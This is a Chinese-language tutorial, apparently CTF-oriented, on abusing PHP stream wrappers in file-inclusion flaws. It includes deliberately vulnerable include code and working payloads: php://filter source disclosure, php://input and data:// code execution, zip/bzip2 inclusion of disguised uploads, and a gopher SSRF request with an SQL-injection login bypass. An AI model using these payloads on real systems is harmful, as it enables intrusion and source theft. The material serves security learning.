0x00 测试代码

  1. <?php
  2. if(isset($_GET['page']))
  3. {
  4. include $_GET['page'];
  5. }
  6. ?>

0x01 PHP的一些伪协议

协议 功能
file:// 访问本地文件系统
http:// 访问 HTTP(S) 网址
ftp:// 访问 FTP(S) URL
php:// 访问各个输入/输出流(I/O streams)
zlib:// 压缩流
data:// 数据(RFC 2397)
glob:// 查找匹配的文件路径模式
phar:// PHP 归档
ssh2:// Secure Shell 2
rar:// RAR
ogg:// 音频流
expect:// 处理交互式的流

0x02 file://协议

  1. PHP.ini
  2. file:// 协议在双off的情况下也可以正常使用;
  3. allow_url_fopen off/on
  4. allow_url_includeoff/on

file:// 用于访问本地文件

file:// [文件的绝对路径和文件名]

打开: http://atest.test/1.php?x=file://E:/WWW/1.jpg

image.png

0x03 php://协议

  1. php://filter在双off的情况下也可以正常使用;
  2. 条件:
  3. 不需要开启allow_url_fopen
  4. php://input、 php://stdin、 php://memory 和 php://temp 需要开启 allow_url_include。

php:// 访问各个输入/输出流(I/O streams)

在CTF中经常使用的是php://filter和php://input

php://filter用于读取源码
php://input用于执行php代码

0x03.1 php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。

  1. resource=<要过滤的数据流> 这个参数是必须的。它指定了你要筛选过滤的数据流。
  2. read=<读链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
  3. write=<写链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
  4. <;两个链的筛选列表> 任何没有以 read= write= 作前缀 的筛选器列表会视情况应用于读或写链。

可以运用多种过滤器(字符串/转换/压缩/加密)
例如平时我们用来任意文件读取的payload

image.png

  1. http://atest.test/1.php?x=php://filter/read=convert.base64-encode/resource=upload.php
  2. 这里读的过滤器为convert.base64-encode,就和字面上的意思一样,把输入流base64-encode
  3. resource=upload.php,代表读取upload.php的内容

这样就可以以base64编码的方式读取文件源代码

过滤器

过滤器有很多种,有字符串过滤器、转换过滤器、压缩过滤器、加密过滤器

<字符串过滤器>

  1. string.rot13
  2. 进行rot13转换
  3. string.toupper
  4. 将字符全部大写
  5. string.tolower
  6. 将字符全部小写
  7. string.strip_tags
  8. 去除空字符、HTML PHP 标记后的结果。
  9. 功能类似于strip_tags()函数,若不想某些字符不被消除,后面跟上字符,可利用字符串或是数组两种方式。

举例

  1. <?php
  2. $fp = fopen('php://output', 'w');
  3. stream_filter_append($fp, 'string.rot13');
  4. echo "rot13:";
  5. fwrite($fp, "This is a test.\n");
  6. fclose($fp);
  7. echo "<br>";
  8. $fp = fopen('php://output', 'w');
  9. stream_filter_append($fp, 'string.toupper');
  10. echo "Upper:";
  11. fwrite($fp, "This is a test.\n");
  12. fclose($fp);
  13. echo "<br>";
  14. $fp = fopen('php://output', 'w');
  15. stream_filter_append($fp, 'string.tolower');
  16. echo "Lower:";
  17. fwrite($fp, "This is a test.\n");
  18. fclose($fp);
  19. echo "<br>";
  20. $fp = fopen('php://output', 'w');
  21. echo "Del1:";
  22. stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE);
  23. fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
  24. fclose($fp);
  25. echo "<br>";
  26. $fp = fopen('php://output', 'w');
  27. echo "Del2:";
  28. stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, "<b>");
  29. fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
  30. fclose($fp);
  31. echo "<br>";
  32. $fp = fopen('php://output', 'w');
  33. stream_filter_append($fp, 'string.strip_tags', STREAM_FILTER_WRITE, array('b','h1'));
  34. echo "Del3:";
  35. fwrite($fp, "<b>This is a test.</b>!!!!<h1>~~~~</h1>\n");
  36. fclose($fp);
  37. ?>

image.png

<转换过滤器>

image.png

举例:

  1. <?php
  2. $fp = fopen('php://output', 'w');
  3. stream_filter_append($fp, 'convert.base64-encode');
  4. echo "base64-encode:";
  5. fwrite($fp, "This is a test.\n");
  6. fclose($fp);
  7. echo "<br>";
  8. $param = array('line-length' => 8, 'line-break-chars' => "\n");
  9. $fp = fopen('php://output', 'w');
  10. stream_filter_append($fp, 'convert.base64-encode', STREAM_FILTER_WRITE, $param);
  11. echo "\nbase64-encode-split:\n";
  12. fwrite($fp, "This is a test.\n");
  13. fclose($fp);
  14. echo "<br>";
  15. $fp = fopen('php://output', 'w');
  16. stream_filter_append($fp, 'convert.base64-decode');
  17. echo "\nbase64-decode:";
  18. fwrite($fp, "VGhpcyBpcyBhIHRlc3QuCg==\n");
  19. fclose($fp);
  20. echo "<br>";
  21. $fp = fopen('php://output', 'w');
  22. stream_filter_append($fp, 'convert.quoted-printable-encode');
  23. echo "quoted-printable-encode:";
  24. fwrite($fp, "This is a test.\n");
  25. fclose($fp);
  26. echo "<br>";
  27. $fp = fopen('php://output', 'w');
  28. stream_filter_append($fp, 'convert.quoted-printable-decode');
  29. echo "\nquoted-printable-decode:";
  30. fwrite($fp, "This is a test.=0A");
  31. fclose($fp);
  32. echo "<br>";
  33. ?>

image.png

<压缩过滤器>

image.png

zlib.* 压缩过滤器自 PHP 版本 5.1.0起可用,在激活 zlib的前提下。也可以通过安装来自 » PECL的 » zlib_filter包作为一个后门在 5.0.x版中使用。

此过滤器在 PHP 4 中 不可用。

  1. <?php
  2. $params = array('level' => 6, 'window' => 15, 'memory' => 9);
  3. $original_text = "This is a test.\nThis is only a test.\nThis is not an important string.\n";
  4. echo "The original text is " . strlen($original_text) . " characters long.\n";
  5. $fp = fopen('test.deflated', 'w');
  6. stream_filter_append($fp, 'zlib.deflate', STREAM_FILTER_WRITE, $params);
  7. fwrite($fp, $original_text);
  8. fclose($fp);
  9. echo "The compressed file is " . filesize('test.deflated') . " bytes long.\n";
  10. echo "The original text was:\n";
  11. /* Use readfile and zlib.inflate to decompress on the fly */
  12. readfile('php://filter/zlib.inflate/resource=test.deflated');
  13. /* Generates output:
  14. The original text is 70 characters long.
  15. The compressed file is 56 bytes long.
  16. The original text was:
  17. This is a test.
  18. This is only a test.
  19. This is not an important string.
  20. */
  21. ?>

<加密过滤器>

image.png

0x04 php://filter 读PHP文件源码

如果说我们直接包含php文件的话会被解析,导致不能看到源码,所以可以用封装协议读取文件

例如我们攻击的时候: http://atest.test/1.php?x=php://filter/read=convert.base64-encode/resource=1.php

表示读取1.php 这个文件的源码
image.png

image.png

0x05 php://input 执行代码

php://input 是个可以访问请求的原始数据的只读流,可以读取到post没有解析的原始数据, 将post请求中的数据作为PHP代码执行。

因为它不依赖于特定的 php.ini 指令。
注:enctype=”multipart/form-data” 的时候 php://input 是无效的。

  1. allow_url_fopen off/on # 开启关闭都可以
  2. allow_url_includeon # 必须开启

image.png

0x06 php://output

是一个只写的数据流, 允许你以 print 和 echo 一样的方式 写入到输出缓冲区。

  1. <?php
  2. $code=$_GET["a"];
  3. file_put_contents($code,"test");
  4. ?>

image.png

0x07 data://

data:资源类型;编码,内容
数据流封装器
当allow_url_include 打开的时候,任意文件包含就会成为任意命令执行

  1. PHP.ini
  2. data://协议必须双在on才能正常使用;
  3. allow_url_fopen on
  4. allow_url_includeon
  5. php 版本大于等于 php5.2
  1. # 测试代码
  2. # 文件名称: xxx.php
  3. <?php
  4. $filename=$_GET["a"];
  5. include("$filename");
  6. ?>
  1. 利用方法
  2. http://127.0.0.1/xxx.php?a=data://text/plain,<?php phpinfo()?>
  3. or
  4. http://127.0.0.1/xxx.php?a=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
  5. 或者
  6. http://127.0.0.1/xxx.php?a=data:text/plain,<?php phpinfo()?>
  7. or
  8. http://127.0.0.1/xxx.php?a=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

image.png

0x08 zip://, bzip2://, zlib://协议

  1. PHP.ini
  2. zip://, bzip2://, zlib://协议在双off的情况下也可以正常使用;
  3. allow_url_fopen off/on
  4. allow_url_includeoff/on
  1. 3个封装协议,都是直接打开压缩文件。
  2. compress.zlib://file.gz - 处理的是 '.gz' 后缀的压缩包
  3. compress.bzip2://file.bz2 - 处理的是 '.bz2' 后缀的压缩包
  4. zip://archive.zip#dir/file.txt - 处理的是 '.zip' 后缀的压缩包里的文件

zip://, bzip2://, zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名。

zip://协议

php 版本大于等于 php5.3.0
使用方法:
zip://archive.zip#dir/file.txt
zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]**
要用绝对路径+url编码#

测试:
新建一个名为zip.txt的文件,内容为<?php phpinfo();?>,然后压缩为名为test.zip的zip文件。

如果可以上传zip文件则上传zip文件,若不能则重命名为test.jpg后上传。

其他几种压缩格式也可以这样操作。
image.png
更名为jpg

payload:http://127.0.0.1/xxx.php?a=zip://C:\Users\liuxianglai\Desktop\test.jpg%23zip.txt

image.png

bzip2://协议

使用方法:
compress.bzip2://file.bz2
相对路径也可以

测试
用7-zip生成一个bz2压缩文件。
pyload:http://127.0.0.1/xxx.php?a=compress.bzip2://C:/Users/liuxianglai/Desktop/test.bz2
或者文件改为jpg后缀
http://127.0.0.1/xxx.php?a=compress.bzip2://C:/Users/liuxianglai/Desktop/test.jpg

image.png

zlib://协议

使用方法:
compress.zlib://file.gz
相对路径也可以

http://127.0.0.1/xxx.php?a=compress.zlib://file.gz

image.png

  1. # 1.jpg 代码
  2. <?php phpinfo(); ?>

image.png

0x09 php伪协议结

image.png

0x10 gopher协议

不属于php伪协议,仅作记录在ssrf时常常会用到gopher协议构造post包来攻击内网应用。

不同的点在于gopher协议没有默认端口,所以需要指定web端口,而且需要指定post方法。

使用%0d%a。注意post参数之间的&分隔符也要进行url编码

具体的gopher协议的例子

  1. gopher://172.16.181.166:80/_POST /admin/wllmctf_login.php HTTP/1.1%0d%0a
  2. Host: 172.16.191.166%0d%0a
  3. User-Agent: curl/7.43.0%0d%0a
  4. Accept: */*%0d%0a
  5. Content-Length: 29%0d%0a
  6. Content-Type: application/x-www-form-urlencoded%0d%0a%0d%0a
  7. user=admin' or '1'='1%26password=admin

注意:如果ssrf的点是get参数,因为处于url中,则需要进行一次url编码